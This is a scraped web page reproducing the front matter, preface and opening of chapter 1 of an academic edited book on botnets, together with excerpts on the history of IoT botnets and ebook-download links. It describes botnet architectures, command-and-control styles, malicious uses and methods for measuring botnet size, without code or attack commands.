BillGates (2015), XOR.DDoS (2015), LUABOT (2016), Remaiten (2016),
NewAidra/IRCTelnet (2016), and Mirai (2016). All were improved variants or
re-combined code of previous malwares in terms of scanning and exploiting,
C2 protocols, and supported architectures. In September 2015, the FBI and
the Department of Homeland Security published an alert on the opportunities
provided by IoT for cybercrimes [6]. Despite the warning, in June 2016,
a botnet consisting of 25,000 CCTV cameras assaulted an online jewelry story
[7], and just a few months later the infamous Mirai demonstrated the
deplorable state of IoT security by enslaving multiple hundreds of thousands
devices and performing extinction-level DDoS attacks on the DNS provi-
der Dyn.
IoT Botnets ■ 35](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-52-320.jpg)
![From that moment forward, increasingly creative and sophisticated IoT botnets
were observed. Below is a non-exhaustive list illustrating the IoT botnets that
represent a milestone in the growth in sophistication of IoT botnets:
■ The Hide N’ Seek (HNS) botnet was one of the first to take a stab at
persistence across boots, a nontrivial feature to implement given the
diversity of devices. HNS also implemented a custom peer-to-peer protocol
for its C2 communications.
■ Satori, the botnet that kept coming back in different forms and kept
creating waves of IoT infections while changing infection vectors. Abusing
the most obvious IoT exploits while adding new ones such as the Android
Debug Bridge exploit. Satori carried mostly crypto mining payloads and no
DDoS attacks and was an experiment by its author for testing and tuning
exploit vectors. The author, a confused teenager, was mainly motivated by
efame among his peers and known to have money issues, the mining
earnings were a welcome bonus of his experiments.
■ OMG [8], a botnet that added a tiny footprint, open-source proxy server
in the bots to create an anonymizer network based on other peoples’
appliances.
■ VPNFilter [2], a botnet primarily targeting routers and modems geolo-
cated in Ukraine, was found carrying malicious payloads to proxy its
victims’ internet traffic and scan for Modbus traffic on the local network.
Allegedly a nation-state botnet with a complex multistage infection
scheme, numerous evasions and provisions to protect against takedown of
its C2 infrastructure.
A few days before the Dyn attacks by Mirai, researchers from Rapidity Networks
discovered a much more sophisticated and competing IoT botnet. They named it
“Hajime” [9], “beginning” in Japanese, a playful iteration on the Mirai name that
means “future” in Japanese. Hajime uses a distributed peer-to-peer protocol
implemented on top of BitTorrent using daily rotating info hashes and RC4
public/private key encryption. Hajime can update itself and extend its capabilities
through extension modules. Hajime is supposedly a white hat project—a botnet
build to protect vulnerable IoT devices from further abuse by malicious botnets.
It marked a new era in which white hat botnets could bring a solution by
inoculating the internet against the viral spreading of malicious botnets through
vulnerable IoT devices. In the same spirit, there was BrickerBot [10], a vigilante
botnet designed to purge the internet from vulnerable IoT devices. Using
sentinels that watch for infected devices that attempt to compromise one of his
bots, BrickerBot would retaliate to the attacker with devastating permanent
denial-of-service (PDoS) attacks. BrickerBot was the first fully autonomous
IoT botnet, not requiring any user interaction to perform attacks and fully
36 ■ Botnets](https://image.slidesharecdn.com/5270208-250621035331-e68396b8/85/Botnets-Architectures-Countermeasures-And-Challenges-First-Edition-Anagnostopoulos-53-320.jpg)
Botnets Architectures Countermeasures And Challenges First Edition Anagnostopoulos
- 1. Botnets Architectures Countermeasures And Challenges First Edition Anagnostopoulos download https://ebookbell.com/product/botnets-architectures- countermeasures-and-challenges-first-edition- anagnostopoulos-10540416 Explore and download more ebooks at ebookbell.com
- 2. Here are some recommended products that we believe you will be interested in. You can click the link to download. Botnets Architectures Countermeasures And Challenges Georgios Kambourakis https://ebookbell.com/product/botnets-architectures-countermeasures- and-challenges-georgios-kambourakis-50699384 Botnets The Killer Web Applications Craig A Schiller David Harley Gadi Evron Carsten Willems Tony Bradley All Authors https://ebookbell.com/product/botnets-the-killer-web-applications- craig-a-schiller-david-harley-gadi-evron-carsten-willems-tony-bradley- all-authors-4098154 Botnets 1st Edition Heli Tiirmaaklaar Jan Gassen Elmar Gerhardspadilla https://ebookbell.com/product/botnets-1st-edition-heli-tiirmaaklaar- jan-gassen-elmar-gerhardspadilla-4293388 The Reign Of Botnets Defending Against Abuses Bots And Fraud On The Internet 1st Edition David Senecal https://ebookbell.com/product/the-reign-of-botnets-defending-against- abuses-bots-and-fraud-on-the-internet-1st-edition-david- senecal-57576466
- 3. Advanced Monitoring In P2p Botnets 1st Ed Shankar Karuppayah https://ebookbell.com/product/advanced-monitoring-in-p2p-botnets-1st- ed-shankar-karuppayah-7157014 Malware Rootkits Botnets A Beginners Guide Canto Julioperdisci https://ebookbell.com/product/malware-rootkits-botnets-a-beginners- guide-canto-julioperdisci-11800074 Malware Rootkits Botnets A Beginners Guide Christopher C Elisan https://ebookbell.com/product/malware-rootkits-botnets-a-beginners- guide-christopher-c-elisan-5902548 Malware Rootkits Botnets A Beginners Guide Elisan Christopher https://ebookbell.com/product/malware-rootkits-botnets-a-beginners- guide-elisan-christopher-11697634 Malware Rootkits Botnets Christopher Elisan https://ebookbell.com/product/malware-rootkits-botnets-christopher- elisan-11697628
- 6. Botnets
- 8. Botnets Architectures, Countermeasures, and Challenges Edited by Georgios Kambourakis Marios Anagnostopoulos Weizhi Meng Peng Zhou
- 9. CRC Press Taylor & Francis Group 6000 Broken Sound Parkway NW, Suite 300 Boca Raton, FL 33487-2742 © 2020 by Taylor & Francis Group, LLC CRC Press is an imprint of Taylor & Francis Group, an Informa business No claim to original U.S. Government works Printed on acid-free paper International Standard Book Number-13: 978-0-367-19154-2 (Hardback) This book contains information obtained from authentic and highly regarded sources. Reasonable efforts have been made to publish reliable data and information, but the author and publisher cannot assume responsibility for the validity of all materials or the consequences of their use. The authors and publishers have attempted to trace the copyright holders of all material reproduced in this publication and apologize to copyright holders if permission to publish in this form has not been obtained. If any copyright material has not been acknowledged please write and let us know so we may rectify in any future reprint. Except as permitted under U.S. Copyright Law, no part of this book may be reprinted, reproduced, transmitted, or utilized in any form by any electronic, mechanical, or other means, now known or hereafter invented, including photocopying, microfilming, and recording, or in any information storage or retrieval system, without written permission from the publishers. For permission to photocopy or use material electronically from this work, please access www.copyright. com (www.copyright.com/) or contact the Copyright Clearance Center, Inc. (CCC), 222 Rosewood Drive, Danvers, MA 01923, 978-750-8400. CCC is a not-for-profit organization that provides licenses and registration for a variety of users. For organizations that have been granted a photocopy license by the CCC, a separate system of payment has been arranged. Trademark Notice: Product or corporate names may be trademarks or registered trademarks, and are used only for identification and explanation without intent to infringe. Visit the Taylor & Francis Web site at www.taylorandfrancis.com and the CRC Press Web site at www.crcpress.com
- 10. Contents Preface.......................................................................................................... vii About the Editors ...........................................................................................ix Contributors...................................................................................................xi 1 Botnet Architectures: A State-of-the-Art Review.................................... 1 BASHEER AL-DUWAIR AND MOATH JARRAH 2 IoT Botnets: The Journey So Far and the Road Ahead........................ 33 PASCAL GEENENS 3 IoT Botnet Traits and Techniques: A View of the State of the Art .... 101 PASCAL GEENENS 4 Advanced Information Hiding Techniques for Modern Botnets ....... 165 LUCA CAVIGLIONE, WOJCIECH MAZURCZYK, AND STEFFEN WENDZEL 5 Steganography Techniques for Command and Control (C2) Channels.................................................................................... 189 JEDRZEJ BIENIASZ AND KRZYSZTOF SZCZYPIORSKI 6 Blockchain-Based Botnets for Command-and-Control Resilience .... 217 WEIZHI WANG AND XIAOBO MA 7 Detecting Botnets and Unknown Network Attacks in Big Traffic Data ................................................................................. 237 LUIS SACRAMENTO, IBÉRIA MEDEIROS, JOÃO BOTA, AND MIGUEL CORREIA 8 Domain Generation Algorithm Detection Techniques through Network Analysis and Machine Learning .......................................... 269 FEDERICA BISIO, SALVATORE SAELI, AND DANILO MASSA v
- 11. 9 Identifying IoT-Based Botnets: A Microservice Architecture for IoT Management and Security........................................................... 293 THARUN KAMMARA AND MELODY MOH 10 Understanding and Detecting Social Botnet.......................................327 YUEDE JI AND QIANG LI 11 Use of Botnets for Mining Cryptocurrencies......................................359 RENITA MURIMI 12 Time to Diverge the Botnet Revenues from Criminal Wallet?............387 GIOVANNI BOTTAZZI, GIANLUIGI ME, PIERLUIGI PERRONE, AND GIUSEPPE GIULIO RUTIGLIANO Index............................................................................................................403 vi ■ Contents
- 12. Preface Botnets pose a growing threat to the Internet, with their ever-increasing distributed denial of service (DDoS) attacks of various kinds. In the Internet of Everything (IoE) era, a botnet army can be assembled using a variety of enslaved machines, including desktop computers, smartphones, wearables, and embedded devices. These multitudinous armies are controlled remotely by a malicious third party, known as the botmaster or botherder. Recent botnet examples, such as the case of the Mirai botnet, prove that it is quite straightforward to discover and remotely control thousands or millions unmonitored and poorly protected devices. The mushrooming of cheap Internet of Things (IoT) devices deployed with the default settings and poor protection gives rise to even greater concerns, which are mightier in population. This paves the way for assembling powerful botnets. To stay off the radar and increase the resilience of their botnet, botmasters employ covert command and control (C2) channels for keeping in touch with the bots and disseminate their instructions. Nowadays, they even hide their C2 servers inside the vast cloud-computing infrastructure and exploit robust anon- ymity networks such as Tor and I2P. To do so, a botmaster takes advantage of a variety of architectures, namely centralized, decentralized, and hybrid, rely on network protocols, including HTTP, IRC, DNS, and P2P, and exploits techni- ques like fast-fluxing and domain generation algorithm (DGA). On the other hand, the efforts of the defenders are focusing on the timely detection and hijacking of the C2 channel to isolate the bots from their controller. Besides launching DDoS attacks, botnets are used for spam campaigns, sensitive data harvesting, distribution of malware, cryptocurrency mining, defamation cam- paigns, to name a few. In fact, a botnet is the perfect means to exercise economically profitable low-risk criminal activities. Typically, the botmaster leases their infrastruc- ture to potential customers for accomplishing their goals. So, even for a naive attacker, it is easy to hire for a specific period the service of a botnet in order to fulfil their nefarious desires, while the accumulative revenue for the botmaster are huge. Perhaps the most popular service that actually sells access to DDoS botnets is well-known as DDoS-for-hire or euphemistically “Stresser.” Of course, all these botnet services are created by cybercrime-as-a-service producers. Even more, with vii
- 13. the exploitation of the infected machines’ computer power for cryptocurrency mining, the profit of the botmaster can be significantly increased, while the trace- back of the revenues is rendered impossible. This book comprises a number of state-of-the-art contributions from both scientists and practitioners working in the detection of botnets, and prevention and mitigation of their aftermath. It aspires to provide a relevant reference for students, researchers, engineers, and professionals working in this particular area or those interested in grasping its diverse facets and exploring the latest advances on the botnets’ issue. More specifically, the book consists of 12 contributions classified into 4 pivotal subareas: Botnet architectures: Introducing the state-of-the-art botnet architectures, the most prominent IoT-based botnet cases, and the latest traits and techniques for IoT-based botnets. C2 channels: Offering the latest variants of advanced and sophisticated C2 channels based on information hiding techniques, steganography, and blockchain technology. Detection and mitigation of botnets: Dealing with the detection of commu- nication of botnets in big data, the analysis of network traces for the detection of algorithmically generated domains utilized for the coordination of botnets, the identification of IoT-based botnets via microservice architectures, and the detec- tion of social botnets. Financial revenue from botnets: Exploring the exploitation of botnets for mining cryptocurrencies, and the utilization of botnets as a profitable tool for criminals. viii ■ Preface
- 14. About the Editors Dr. Marios Anagnostopoulos received his Ph.D. degree in information and communication systems engineering from the Department of Information and Communication Systems Engineering, University of the Aegean, Greece, in 2016. The title of his doctoral thesis was “DNS as a multipurpose attack vector.” Currently, he is Post-Doctoral Research Fellow in the Norwegian University of Science and Technology (NTNU). Prior to joining NTNU, he worked as Post- Doctoral Research Fellow in the Singapore University of Technology and Design (SUTD). His research interests are in the fields of network security and privacy, mobile and wireless networks security, cyber-physical security, and blockchain in security and privacy. Dr. Georgios Kambourakis received the Ph.D. degree in information and communication systems engineering from the Department of Information and Communications Systems Engineering, University of the Aegean, Greece, where he is currently an associate professor, and the head of the department. His research interests are in the fields of mobile and wireless networks security and privacy. He has over 120 refereed publications in the aforementioned fields of study. For more information, please visit http://www.icsd.aegean.gr/gkamb. Dr. Weizhi Meng is currently an assistant professor in the Cyber Security Section, Department of Applied Mathematics and Computer Science, Technical University of Denmark (DTU), Denmark. He received his Ph.D. degree in computer science from the City University of Hong Kong (CityU), China. Prior to joining DTU, he worked as a research scientist in Institute for Infocomm Research, A*Star, Singapore, and as a senior research associate in CS Department, CityU. He won the Out- standing Academic Performance Award during his doctoral study and is a recipient of the Hong Kong Institution of Engineers (HKIE) Outstanding Paper Award for Young Engineers/Researchers in both 2014 and 2017. He is also a recipient of Best Paper Award from ISPEC 2018 and Best Student Paper Award from NSS 2016. His primary research interests are cyber security and intelligent technology in security, ix
- 15. including intrusion detection, smartphone security, biometric authentication, HCI security, trust management, blockchain in security, and malware analysis. Dr. Peng Zhou is currently an associate professor at Shanghai University. He has received his Ph.D. degree from the Hong Kong Polytechnic University and worked as a research fellow in Singapore Nanyang Technological University for one year. His research interests include network security, computer worms and propagation, and machine learning. x ■ About the Editors
- 16. Contributors Yuede Ji George Washington University Qiang Li College of Computer Science and Technology Jilin University Changchun, China Miguel Correia INESC-ID, Instituto Superior Técnico Universidade de Lisboa Luís Sacramento INESC-ID, Instituto Superior Técnico Universidade de Lisboa Ibéria Medeiros LASIGE, Faculdade de Ciências Universidade de Lisboa João Bota Vodafone Portugal Melody Moh Dept. of Computer Science San Jose State University San Jose, CA, USA Tharun Kammara Dept. of Computer Science San Jose State University San Jose, CA, USA Luca Caviglione Institute for Applied Mathematics and Information Technologies National Research Council of Italy Italy Wojciech Mazurczyk Warsaw University of Technology Poland Steffen Wendzel Worms University of Applied Sciences Germany Federica Bisio aizoOn, Strada del Lionetto Torino, Italy Danilo Massa aizoOn, Strada del Lionetto Torino, Italy Giuseppe Giulio Rutigliano University of Rome Tor Vergata Italy xi
- 17. Giovanni Bottazzi LUISS Guido Carli University Italy Gianluigi Me LUISS Guido Carli University Italy Pierluigi Perrone University of Rome Tor Vergata Italy Renita Murimi Oklahoma Baptist University USA Basheer Al-Duwairi Jordan University of Science and Technology Jordan Moath Jarrah Jordan University of Science and Technology Jordan Pascal Geenens Radware, Inc. Xiaobo Ma Ministry of Education Key Lab for Intelligent Networks and Network Security, School of Electronic and Information Engineering Xi’an Jiaotong University Weizhi WANG Ministry of Education Key Lab for Intelligent Networks and Network Security Xi’an Jiaotong University Jedrzej Bieniasz Institute of Telecommunications Warsaw University of Technology Poland Krzysztof Szczypiorski Institute of Telecommunications Warsaw University of Technology Poland xii ■ Contributors
- 18. Chapter 1 Botnet Architectures A State-of-the-Art Review Basheer Al-Duwairi and Moath Jarrah Faculty of Computer & Information Technology, Jordan University of Science & Technology, Jordan Contents 1.1 Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2 1.2 Botnets main characteristics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3 1.2.1 Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.2.2 Characterizing botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 1.2.2.1 The botnet size. . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 1.2.2.2 Geographical Distribution of Botnets. . . . . . . . . . . . . 8 1.2.2.3 Spatial-Temporal Correlation and Similarity . . . . . . . . 9 1.3 Centralized Botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .10 1.3.1 Case study: IRC-based botnets. . . . . . . . . . . . . . . . . . . . . . . .11 1.4 P2P Botnets. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14 1.4.1 Case study: ZeroAccess P2P botnet . . . . . . . . . . . . . . . . . . . .16 1.5 Mobile Botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .18 1.5.1 Examples of mobile botnets. . . . . . . . . . . . . . . . . . . . . . . . . .21 1.5.1.1 SMS-based mobile botnets . . . . . . . . . . . . . . . . . . . .21 1.5.1.2 Cloud-based push-styled mobile botnets . . . . . . . . . . .21 1.6 IoT Botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .22 1.7 Social Botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24 1.7.1 Operation. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24 1.8 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .25 1
- 19. 1.1 Introduction In recent years, cybercrimes that are associated with botnets have been considered a major threat to the Internet and technology. A botnet consists of a number of infected hosts and receive commands from a botmaster [1]. The botnet is basically formed by installing bots on vulnerable computers. Bots are software programs that perform actions upon receiving commands from users or programs. Bots usually stay in a passive state until they receive commands from the botmaster (a hacker). Bots are designed to establish and utilize available commu- nication channels that enable them of receiving commands, executing commands, and periodically reporting data back to the botmaster. Reports include their status and statistical information. Furthermore, bots are usually programmed to keep up to date with the latest bot version. The botmaster maintains control over the botnet through the command and control (C&C) communication channel that represents the core of the botnet. Generally, bots try to exploit software vulnerabilities that allow malicious programs to infect computing systems. Examples of software vulnerabilities are buffer overflow, backdoor installations, software bugs, and unsecured memory management mechanisms. Releasing bot codes to the public results in spreading of many variants of the bot within a short time [2–5]. Making the bot’s source code available makes it easier for hackers to extend it and develop more sophisticated codes to serve their objectives. For example, Agobot is structured in a modular design, which makes it attractive for botnet’s developers. According to [2], there exist different types of bots and different variants of each type in today’s digital computing world. Hackers are always interested in discovering new software vulnerabilities and in improving their bots to higher level of sophistica- tion. Hence, it is expected that more bots will evolve and pose serious threats. This urges companies and researchers to develop efficient countermeasure meth- ods to stop the cybercrimes that are posed by botnets. Botnets represent a major contributor to malicious traffic in today’s Internet [1]. Moreover, the botnet attack landscape has increased tremendously in recent years because of new highly sophisticated versions of botnets. The development of botnet architectures and types are driven by hackers’ interest, the expansion of the Internet, and the Internet technology development. Organized hacking groups, organizations, and cyber criminals are increasingly threatening businesses, where about one-third of the world companies have experienced the threat of cyber- crimes [6]. Botnets are being used extensively for malware distribution to target banking sectors [7]. Botnets provide hackers with a platform for personal profit and financial gain through extortion, ransom-ware, and cryptocurrency. Cyber- attacks are also targeting critical Internet infrastructure and cyber-physical systems, including smart grids, nuclear plants, and transportation systems. In addition, botnets are expected to take a role in future cyber wars. With the 2 ■ Botnet
- 20. tremendous expansion of the Internet, botnets are no longer limited to infect only PCs and laptops. Several types of botnets have appeared in recent years such as smartphone, Internet of Things (IoT), and social botnets. The enormous growth of botnets enabled hackers to use them for different forms of malicious activity including distributed denial-of-service (DDoS) attacks, email spam, click- fraud, and identity theft. In this context, botnets can be viewed as an attack infrastructure that is used to launch several types of cybercrimes. This chapter is focused on the emerging and predominant threat of botnets. In Section 1.2, we provide a detailed description of botnets and we discuss their main characteristics. Section 1.3 discusses centralized botnets. Section 1.4 explains peer-to-peer (P2P) botnets. Section 1.5 presents mobile botnets. Section 1.6 provides a description on IoT-based botnets. Social botnets are presented in Section 1.7. Finally, the conclusion is presented in Section 1.8. 1.2 Botnets Main Characteristics A botnet can be viewed as an attack infrastructure that consists of compromised hosts that are connected together to form a network using a variety of application layer protocols, such as IRC, HTTP, email, and P2P protocols. In this section, we discuss botnet life cycle, explain their malicious usage, discuss their main characteristics, and illustrate different approaches that are used to obtain insight- ful information about botnets. 1.2.1 Overview A botnet’s life time consists of three main stages as follows. Stage 1—recruitment stage: The botnet formation starts by recruiting as many vulnerable machines as possible to become part of a botnet. This is done through infecting machines with the bot code using different mechanisms. One of the mechanisms adopts traditional worm propagation techniques to spread botnet malware [8,9]. This approach does not require any user intervention. An infected machine has the ability to search for other vulnerable machines on the Internet through active scanning for holes of known vulnerabilities. There are several mechanisms to recruit vulnerable machines in a passive manner where user interventions are required. Social engineering is a powerful mechanism that is used by botmasters to convince end users to download bot binaries [10,11]. This is usually achieved by sending out massive phishing campaigns through email and social networks (e.g., Twitter, Facebook), where a user is tricked to click on a malicious link that results in downloading of a bot binary [12,13]. In other cases, the malware may spread as an email attachment or by tricking the user to visit websites that have active content such as JavaScripts or ActiveX controls. Botnet Architectures ■ 3
- 21. When a user visits a website that contains malicious active contents, the malware is installed automatically. It is also possible to spread botnets’ binaries through physical media (e.g., USB flash drive), where the malware is usually in the form of an executable and starts running as soon as the user double click on it. Physical media infection aims to compromise machines with private IP address that are unreachable directly from the Internet (e.g., behind a NAT box). Stage 2—C&C stage: The botmaster maintains a control over the infected machines (bots) through a C&C channel. The architecture of the botnet depends on the implementation of the C&C channel. In centralized botnets, the botmaster controls its botnet through a central server known as the C&C server. In P2P botnets, there is no central server between the botmaster and botnet machines. Hence, the botmaster communicates directly with a small subset of botnet machines. These machines in the subset serve as mailboxes between the botmaster and other botnet machines. The machines are located using the inherent features of the P2P protocol that is used to implement the botnet. More details of centralized and P2P botnets are provided in Section 1.3 and Section 1.4. The communication style between the botmaster and the bots can be a Push or a Pull style. In the Push style, commands are sent directly to the bots. In the Pull style, bots (infected machines) keep checking for new commands periodically [14]. The two communication styles are illustrated in Figure 1.1. Stage 3—botnet activity stage: The botnet activity represents the set of actions and attacks (e.g., DDoS, scanning, etc.) that are performed by bots in response to commands that are issued by the botmaster [15–17]. A compromised host’s bandwidth is an important information that indicates the host’s capability in launching attacks, especially DDoS. Hence, bots estimates the host’s bandwidth by sending data to many servers. Figure 1.2 shows an example of an IRC-based botnet Commands Botmaster Botnet Any command? Botmaster Botnet (a) Push Style (b) Pull Style Figure 1.1 Botnet communication styles: (a) Push style (b) Pull style. 4 ■ Botnet
- 22. activity in response to a set of commands that were issued by the botmaster. The figure shows the interaction between a botmaster (nickname seed) and one of the bots (nickname vofm) in an IRC chat channel (#nes554). This is a typical example of a push style communication where the botmaster issues certain commands that are sent to the bot directly. For example, the command .open notepad instructs the bot to run notepad.exe. Running notepad application is just an example that shows the capabilities of this botnet. Botmasters instruct bots to run malware binaries after downloading them from a given server. Other example involves instructing the bot to perform a DNS query for a given host name and return the result to the botmaster. Understanding botnets and their operational aspects require us to investigate different bots to reveal their malicious intents [2]. For example, P. Barford et al. studied the source codebases for the four major botnets Agobot, SDBot, SpyBot, and GT Bot [18]. Analyzing bots’ source code or running a botnet malware instance in a sandbox are efficient methods to identify botnet features and capabilities including the C&C mechanisms. In general, botnets are considered as major sources of different types of attacks and malicious activities in the Internet. This includes the following: Figure 1.2 Example of an IRC-based botnet activity. Botnet Architectures ■ 5
- 23. ■ DDoS attacks: Botnets are used to launch several forms/types of DDoS attacks, such as application layer attacks (e.g., HTTP-based attacks), SYN flooding, and DNS amplification attacks. Bots are instructed to overwhelm the target system with a high volume of traffic rate (e.g., HTTP requests, SYN packets, and DNS requests). ■ Email spam campaigns: This belongs to sending a large amount of spam emails, which results in a traffic that decreases the signal-to-noise measure [19]. Email spammers usually use botnets for massive email spam campaigns to advertise pharmaceutical products, adult content, and malware distribu- tion. An email spam template is distributed along with an email recipients’ list to the workers (bots). The bots are then instructed to send spam with the contents that are specified in advance by the spammer. ■ Identity theft: Botmasters have the ability to collect sensitive information (such as email accounts, banking accounts, and credit card numbers) from the bot machines. ■ Cryptocurrency: The computing power of the machines that belong to a botnet can be utilized by botmasters to perform cryptocurrency mining to obtain bitcoins in an illegal way. ■ Click-Fraud: Whereby a botmaster generates bogus clicks for online adver- tisements (usually utilizing the field of the HTTP request header) that mimic legitimate request patterns, which results in large sums of money to be paid by the advertisers [20]. Online advertisement is becoming very popular where the pricing model for this type of advertisement is usually based on pay-per-click approach, meaning that the revenue for the adver- tisement platform (e.g., Facebook, Google) depends on the number of clicks that are made through the advertisement platform. Unfortunately, several hackers exploit this model and use botnets to perform fraudulent clicks. Based on the above discussion, botnets have two main planes of operation, which are: (i) the C&C plane where bots are continuously waiting for commands from the botmaster, and (ii) the activity plane, which involves the execution of the received commands to launch different attacks such as DDoS, cryptocurrency, spam campaigns, and clicks fraud. The C&C topology determines the method of commands’ delivery. In centralized botnets, the botmaster communicates with the bots through a central server, while in P2P botnets, the botmaster communicates with the bots through a subset of bots (mailboxes). 1.2.2 Characterizing Botnets There have been considerable research efforts to characterize botnets and understand their operations (e.g. [1,15,18,21–23],). These studies focused on estimating botnet sizes, geographical distributions, and their spatial and temporal characteristics. Such 6 ■ Botnet
- 24. characterization was accomplished through conducting post-term analysis of traffic traces and packet logs to gain an insight on the nature of this threat. Also, the community is interested in finding botnets formation techniques. Based on these research studies, the main characteristics of botnets are described further. 1.2.2.1 The Botnet Size The size of a botnet represents an important factor of the intensity and the widespread of cyberattacks. The importance of this metric and its role in measuring the botnet effectiveness have been discussed in [24]. While large botnets are viewed to be a serious threat to the Internet services, small botnets are also a threat especially for attacks that do not require a large amount of traffic such as ransomware and identity theft. Small botnets can be easily managed, rented, and stay undetected. Determining the actual botnet’s size is an important issue because it leads to a better understanding of the threat. In this context, a botnet size has been a point of debate because it is unclear what the term “botnet size” exactly means. The ambiguity in specifying a botnet size is due to several issues that complicate the task of computing the number of compromised machines in a botnet. The join- leave actions of bots result from (i) turning infected machines ON and OFF by their users, (ii) temporary bot migration, in which botmasters ask bots to leave one botnet and join a different botnet, and (iii) cloning, where bots make replicas of themselves and connect to different channels or servers [1]. Most researchers agree that a clear definition for a botnet size must be used. Here we adopt the definition that is used in [24] which states: Botnet size is defined as the largest connected portion of the botnet [24,25]. This does not represent the count of all infected machines within a botnet. It mainly represents the count of online bots (the machines that are currently active). There are several techniques to determine the size of a botnet. These mainly depend on the botnet architecture and the ability to infiltrate or takeover the botnet. The following are the techniques that are typically used to estimate a botnet size [25]: ■ Botnet infiltration: The main idea of this technique is to join the C&C channel of a botnet (e.g., to connect to the IRC server of a botnet), then to record the number of bots that are connected to the channel simulta- neously. This can be achieved by implementing an IRC tracker (similar to the one presented in [1]) that mimics the operation of an actual bot. ■ DNS redirection: This method redirects connections that are made to the botnets’ C&C server to another server (e.g., a sinkhole) through manipulat- ing the DNS entry that is associated with the server [26]. By completing the three way TCP handshake procedure with connected bots, the sinkhole can identify these bots and record their IP addresses. This technique has the limitation of counting bots that attempt to connect to the C&C server Botnet Architectures ■ 7
- 25. during the measurement period. Also, in cases where the botmaster uses multiple channels on the same C&C server, it is not possible to identify bots that belong to a certain channel. Finally, Zou et al. [27] explain that botmasters can easily detect this technique and redirect the bots to connect to a different IRC server. ■ DNS cache snooping: This method collects information from thousands of Domain Name Systems (DNS). It searches the DNS servers’ caches for entries of a botnet’s C&C server. M. Aburajab et al. have used this method successfully and were able to estimate botnet sizes [1]. In most cases, bots need to resolve the IP address of the C&C server by querying the DNS server. Therefore, the size of the botnet can be computed by probing a large collection of DNS servers and the cache hits are reported. The list of available DNS servers can be obtained by performing a fast Internet wide scanning (e.g., using Zmap [28]). A cache hit on a DNS server indicates that there is at least one bot who sent a query request to the server before the expiration time of the corresponding botnet entry. The number of cache hits serves as a lower bound that represents the number of the bots. ■ Crawling P2P botnets: Botnet size estimation in P2P botnets is done mainly by crawling the botnet recursively. Starting with one bot, a request is issued to get its peer-list. A request is then issued for each IP address in the peer list. This process continues in a recursive manner until no additional IP addresses are observed. The crawling speed is important as the structure of P2P botnet graph changes frequently. Bots join and leave in unpredictable way. This phenomena occurs during the time of sending and analyzing peer list requests. Hence, crawling must be done very quickly to get an accurate snapshot of the current P2P graph. 1.2.2.2 Geographical Distribution of Botnets Although bots can be found anywhere in the Internet, research studies show that they are concentrated in particular regions in the world [26]. There are several factors that affect the geographical distribution of botnets. One of these important factors is the underlying bot infection propagation mechanism that involves a region or a language. Some botnets attack applications of a specific language or perform social engineering activities of a specific regional’s language [26]. The distribution of bots in the Internet represents an important issue because it can assist in developing efficient countermeasures [22,23,29]. This distribution is mainly influenced by the distribution of vulnerable machines in the Internet. It is believed that vulnerable machines tend to cluster in certain networks, which suggest that bots will cluster in these networks as well, regardless of the method that is followed by botmasters in constructing botnets. This is based on the 8 ■ Botnet
- 26. observation that the population of vulnerable machines in a given organizational network depends directly on the nature of network security policies that are enforced by the organization, and on the level of awareness of users regarding hardening and protecting their own machines. For example, an organization that enforces strict security policy deploys the latest technology to prevent security breaches, and provides its employees with the state-of-the-art virus scanners, is expected to have very small number of vulnerable machines. M. P. Collins et al. explain that botnets have the following two character- istics [22]: ■ Spatial uncleanliness: When there is a compromised host in a network, there is a high chance of finding other hosts that are compromised and perform hostile activities within the same network. This clustering of hostile activ- ities within a network results in having an unclean network. ■ Temporal uncleanliness: If there is a compromised host in a network, then this host or other hosts within the network are likely to be compromised in the future. Hence, the hosts in the network will undergo hostile activities over time. The test for spatial uncleanliness was conducted through the examination of IP addresses clustering within different networks. It has been found that compromised hosts within equally sized networks are more likely to appear than hosts and addresses that were chosen at random from the Internet population. On the other hand, the test for temporal uncleanliness was conducted through the examination of unclean net- works. Networks that contain compromised hosts are found to be able to predict future hostile activities with a higher accuracy than networks that were chosen at random. 1.2.2.3 Spatial-Temporal Correlation and Similarity In addition to the spatial uncleanliness and temporal uncleanliness described above, botnets are generally characterized by spatial-temporal correlation that follows directly from their inherent features. During a certain time interval, bots within an organizational network perform similar operations in response to commands that are issued by the botmaster. Typically, these bots maintain long lived connections with the C&C server and remain standby for commands. Two types of responses were observed when bots receive commands from the botmaster: ■ Message response: There are certain commands that are used by the botmaster to obtain information about the bot machine. This information includes the operating system version, CPU architecture, bandwidth, and the bot ID. Bots typically respond with short messages that contain the requested information. Figure 1.3a shows an example of message responses of three bots within an organizational network. Botnet Architectures ■ 9
